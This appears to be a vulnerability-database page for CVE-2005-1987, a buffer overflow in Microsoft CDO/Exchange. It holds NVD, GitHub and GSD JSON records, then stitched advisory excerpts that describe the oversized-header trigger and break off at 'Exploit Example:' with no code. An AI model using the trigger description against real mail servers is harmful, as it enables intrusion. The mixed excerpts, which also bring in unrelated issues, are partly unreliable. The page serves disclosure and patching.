af854a3a-2127-422b-91ae-364da2661108	https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1130	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1201	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1406	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1420	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1515	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A581	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A848	Third Party Advisory

Impacted products

Vendor	Product	Version
microsoft	exchange_server	2000
microsoft	windows_2000	-
microsoft	windows_server_2003	-
microsoft	windows_server_2003	-
microsoft	windows_server_2003	r2
microsoft	windows_server_2003	sp1
microsoft	windows_server_2003	sp1
microsoft	windows_xp	-
microsoft	windows_xp	-
microsoft	windows_xp	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:microsoft:exchange_server:2000:sp3:*:*:*:*:*:*",
              "matchCriteriaId": "E88E31D4-1120-4A18-BA65-E2C96B35E599",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:microsoft:windows_2000:-:sp4:*:fr:*:*:*:*",
              "matchCriteriaId": "9FB47735-C33C-43B6-9AC6-E5ECAB18AF47",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_server_2003:-:*:*:*:*:*:itanium:*",
              "matchCriteriaId": "5AA32D8C-430E-4CA2-B2DF-FFF63714F480",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_server_2003:-:*:*:*:*:*:x64:*",
              "matchCriteriaId": "E3C43D05-40F8-4769-BA6B-A376420EA972",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_server_2003:r2:*:*:*:*:*:*:*",
              "matchCriteriaId": "23C65B29-89C4-4C05-BD53-27CAD31810A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_server_2003:sp1:*:*:*:*:*:*:*",
              "matchCriteriaId": "97474F37-792B-4FD1-B8B8-3AAC050DF327",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_server_2003:sp1:*:*:*:*:*:itanium:*",
              "matchCriteriaId": "92759831-AC3F-4F01-919F-8C0BAFE15352",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_xp:-:*:*:*:*:*:x64:*",
              "matchCriteriaId": "949AD335-71B5-4C93-8698-6C17119CE7A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_xp:-:sp1:*:*:tablet_pc:*:*:*",
              "matchCriteriaId": "24FD61D1-518D-47D1-969E-81E3CBCB15FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:microsoft:windows_xp:-:sp2:*:*:tablet_pc:*:*:*",
              "matchCriteriaId": "BD92FDA6-5BD1-4AAD-B1BE-60B477E35316",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the \"Content-Type\" string."
    }
  ],
  "id": "CVE-2005-1987",
  "lastModified": "2026-04-16T00:27:16.627",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": true,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2005-10-13T10:02:00.000",
  "references": [
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Broken Link"
      ],
      "url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://marc.info/?l=bugtraq\u0026m=112915118302012\u0026w=2"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/17167"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://securitytracker.com/id?1015038"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://securitytracker.com/id?1015039"
    },
    {
      "source": "secure@microsoft.com",
      "url": "http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ907245"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/883460"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Broken Link"
      ],
      "url": "http://www.osvdb.org/19905"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/15067"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.us-cert.gov/cas/techalerts/TA05-284A.html"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/22495"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1130"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1201"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1406"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1420"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1515"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A581"
    },
    {
      "source": "secure@microsoft.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A848"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://marc.info/?l=bugtraq\u0026m=112915118302012\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/17167"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://securitytracker.com/id?1015038"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://securitytracker.com/id?1015039"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ907245"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/883460"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://www.osvdb.org/19905"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/15067"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "http://www.us-cert.gov/cas/techalerts/TA05-284A.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/22495"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1130"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1201"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1406"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1420"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1515"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A581"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A848"
    }
  ],
  "sourceIdentifier": "secure@microsoft.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-120"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-PFWW-HW2Q-8MC3

Vulnerability from github – Published: 2022-05-01 02:04 – Updated: 2025-04-03 04:18

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2005-1987"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-120"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2005-10-13T10:02:00Z",
    "severity": "HIGH"
  },
  "details": "Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the \"Content-Type\" string.",
  "id": "GHSA-pfww-hw2q-8mc3",
  "modified": "2025-04-03T04:18:22Z",
  "published": "2022-05-01T02:04:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-1987"
    },
    {
      "type": "WEB",
      "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/22495"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1130"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1201"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1406"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1420"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1515"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A581"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A848"
    },
    {
      "type": "WEB",
      "url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html"
    },
    {
      "type": "WEB",
      "url": "http://marc.info/?l=bugtraq\u0026m=112915118302012\u0026w=2"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/17167"
    },
    {
      "type": "WEB",
      "url": "http://securitytracker.com/id?1015038"
    },
    {
      "type": "WEB",
      "url": "http://securitytracker.com/id?1015039"
    },
    {
      "type": "WEB",
      "url": "http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ907245"
    },
    {
      "type": "WEB",
      "url": "http://support.microsoft.com/default.aspx?scid=kb;[LN];Q907245"
    },
    {
      "type": "WEB",
      "url": "http://www.kb.cert.org/vuls/id/883460"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/19905"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/15067"
    },
    {
      "type": "WEB",
      "url": "http://www.us-cert.gov/cas/techalerts/TA05-284A.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GSD-2005-1987

Vulnerability from gsd - Updated: 2023-12-13 01:20

Details

Aliases

CVE-2005-1987

Aliases

CVE-2005-1987

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2005-1987",
    "description": "Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the \"Content-Type\" string.",
    "id": "GSD-2005-1987"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2005-1987"
      ],
      "details": "Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the \"Content-Type\" string.",
      "id": "GSD-2005-1987",
      "modified": "2023-12-13T01:20:11.302996Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "secure@microsoft.com",
        "ID": "CVE-2005-1987",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the \"Content-Type\" string."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "19905",
            "refsource": "OSVDB",
            "url": "http://www.osvdb.org/19905"
          },
          {
            "name": "Q907245",
            "refsource": "MSKB",
            "url": "http://support.microsoft.com/default.aspx?scid=kb;[LN];Q907245"
          },
          {
            "name": "oval:org.mitre.oval:def:581",
            "refsource": "OVAL",
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A581"
          },
          {
            "name": "oval:org.mitre.oval:def:1406",
            "refsource": "OVAL",
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1406"
          },
          {
            "name": "VU#883460",
            "refsource": "CERT-VN",
            "url": "http://www.kb.cert.org/vuls/id/883460"
          },
          {
            "name": "oval:org.mitre.oval:def:848",
            "refsource": "OVAL",
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A848"
          },
          {
            "name": "oval:org.mitre.oval:def:1515",
            "refsource": "OVAL",
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1515"
          },
          {
            "name": "win-cdo-bo(22495)",
            "refsource": "XF",
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/22495"
          },
          {
            "name": "17167",
            "refsource": "SECUNIA",
            "url": "http://secunia.com/advisories/17167"
          },
          {
            "name": "15067",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/15067"
          },
          {
            "name": "oval:org.mitre.oval:def:1420",
            "refsource": "OVAL",
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1420"
          },
          {
            "name": "MS05-048",
            "refsource": "MS",
            "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048"
          },
          {
            "name": "oval:org.mitre.oval:def:1201",
            "refsource": "OVAL",
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1201"
          },
          {
            "name": "oval:org.mitre.oval:def:1130",
            "refsource": "OVAL",
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1130"
          },
          {
            "name": "TA05-284A",
            "refsource": "CERT",
            "url": "http://www.us-cert.gov/cas/techalerts/TA05-284A.html"
          },
          {
            "name": "1015038",
            "refsource": "SECTRACK",
            "url": "http://securitytracker.com/id?1015038"
          },
          {
            "name": "20051012 [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability",
            "refsource": "FULLDISC",
            "url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html"
          },
          {
            "name": "20051012 [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability",
            "refsource": "BUGTRAQ",
            "url": "http://marc.info/?l=bugtraq\u0026m=112915118302012\u0026w=2"
          },
          {
            "name": "1015039",
            "refsource": "SECTRACK",
            "url": "http://securitytracker.com/id?1015039"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:microsoft:exchange_server:2000:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2000:-:sp4:*:fr:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2003:-:*:*:*:*:*:itanium:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2003:-:*:*:*:*:*:x64:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2003:r2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2003:sp1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2003:sp1:*:*:*:*:*:itanium:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:-:*:*:*:*:*:x64:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:-:sp1:*:*:tablet_pc:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:-:sp2:*:*:tablet_pc:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "secure@microsoft.com",
          "ID": "CVE-2005-1987"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the \"Content-Type\" string."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-120"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "TA05-284A",
              "refsource": "CERT",
              "tags": [
                "Third Party Advisory",
                "US Government Resource"
              ],
              "url": "http://www.us-cert.gov/cas/techalerts/TA05-284A.html"
            },
            {
              "name": "VU#883460",
              "refsource": "CERT-VN",
              "tags": [
                "Third Party Advisory",
                "US Government Resource"
              ],
              "url": "http://www.kb.cert.org/vuls/id/883460"
            },
            {
              "name": "1015038",
              "refsource": "SECTRACK",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://securitytracker.com/id?1015038"
            },
            {
              "name": "1015039",
              "refsource": "SECTRACK",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://securitytracker.com/id?1015039"
            },
            {
              "name": "15067",
              "refsource": "BID",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://www.securityfocus.com/bid/15067"
            },
            {
              "name": "17167",
              "refsource": "SECUNIA",
              "tags": [
                "Third Party Advisory"
              ],
              "url": "http://secunia.com/advisories/17167"
            },
            {
              "name": "20051012 [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability",
              "refsource": "FULLDISC",
              "tags": [
                "Broken Link"
              ],
              "url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html"
            },
            {
              "name": "19905",
              "refsource": "OSVDB",
              "tags": [
                "Broken Link"
              ],
              "url": "http://www.osvdb.org/19905"
            },
            {
              "name": "20051012 [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability",
              "refsource": "BUGTRAQ",
              "tags": [
                "Mailing List",
                "Third Party Advisory"
              ],
              "url": "http://marc.info/?l=bugtraq\u0026m=112915118302012\u0026w=2"
            },
            {
              "name": "win-cdo-bo(22495)",
              "refsource": "XF",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/22495"
            },
            {
              "name": "oval:org.mitre.oval:def:848",
              "refsource": "OVAL",
              "tags": [
                "Third Party Advisory"
              ],
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A848"
            },
            {
              "name": "oval:org.mitre.oval:def:581",
              "refsource": "OVAL",
              "tags": [
                "Third Party Advisory"
              ],
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A581"
            },
            {
              "name": "oval:org.mitre.oval:def:1515",
              "refsource": "OVAL",
              "tags": [
                "Third Party Advisory"
              ],
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1515"
            },
            {
              "name": "oval:org.mitre.oval:def:1420",
              "refsource": "OVAL",
              "tags": [
                "Third Party Advisory"
              ],
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1420"
            },
            {
              "name": "oval:org.mitre.oval:def:1406",
              "refsource": "OVAL",
              "tags": [
                "Third Party Advisory"
              ],
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1406"
            },
            {
              "name": "oval:org.mitre.oval:def:1201",
              "refsource": "OVAL",
              "tags": [
                "Third Party Advisory"
              ],
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1201"
            },
            {
              "name": "oval:org.mitre.oval:def:1130",
              "refsource": "OVAL",
              "tags": [
                "Third Party Advisory"
              ],
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1130"
            },
            {
              "name": "Q907245",
              "refsource": "MSKB",
              "tags": [
                "Patch",
                "Vendor Advisory"
              ],
              "url": "http://support.microsoft.com/default.aspx?scid=kb;[LN];Q907245"
            },
            {
              "name": "MS05-048",
              "refsource": "MS",
              "tags": [
                "Patch",
                "Vendor Advisory"
              ],
              "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": true,
          "severity": "HIGH",
          "userInteractionRequired": false
        }
      },
      "lastModifiedDate": "2020-04-09T13:28Z",
      "publishedDate": "2005-10-13T10:02Z"
    }
  }
}

VAR-200510-0005

Vulnerability from variot - Updated: 2026-04-10 22:24

Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. Microsoft DDS Library Shape Control COM object contains an unspecified vulnerability, which may allow a remote attacker to execute arbitrary code on a vulnerable system. This issue is due to a failure of the library to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer. This issue presents itself when an attacker sends a specifically crafted email message to an email server utilizing the affected library.

The vulnerability has been reported in the following versions: * Windows 2000 (remote code execution) * Windows XP Service Pack 1 (remote code execution) * Windows XP Service Pack 2 (local privilege escalation) * Windows Server 2003 (local privilege escalation) * Windows Server 2003 Service Pack 1 (local privilege escalation)

3) An error in the MSDTC when validating TIP (Transaction Internet Protocol) requests can be exploited to cause the service to stop responding via a specially crafted network message. The malicious TIP message can be transferred through the affected system to another, which causes the MSDTC on both systems to stop responding.

Successful exploitation requires that the TIP protocol is enabled for MSDTC.

SOLUTION: Apply patches.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

. SEC-1 LTD. The vulnerability exists when event sinks are used within Microsoft Exchange 2000 or Microsoft Mail services to parse e-mail content. Several Content Security packages were identified to be vulnerable/exploitable.

The vulnerability can be exploited by crafting an e-mail with a large header name such as "Content-Type:". A failure to correctly determine the length of the string results in a stack overflow. Under certain conditions the vulnerability can also be used to bypass content security mechanisms such as virus and content security scanners. Proof of concept code to recreate the problem is included at the bottom of this advisory.

Exploit Availability:

Sec-1 do not release exploit code to the general public. Attendees of the Sec-1 Applied Hacking & Intrusion prevention course will receive a copy of this exploit as part of the Sec-1 Exploit Arsenal. See: http://www.sec-1.com/applied_hacking_course.html

Exploit Example:

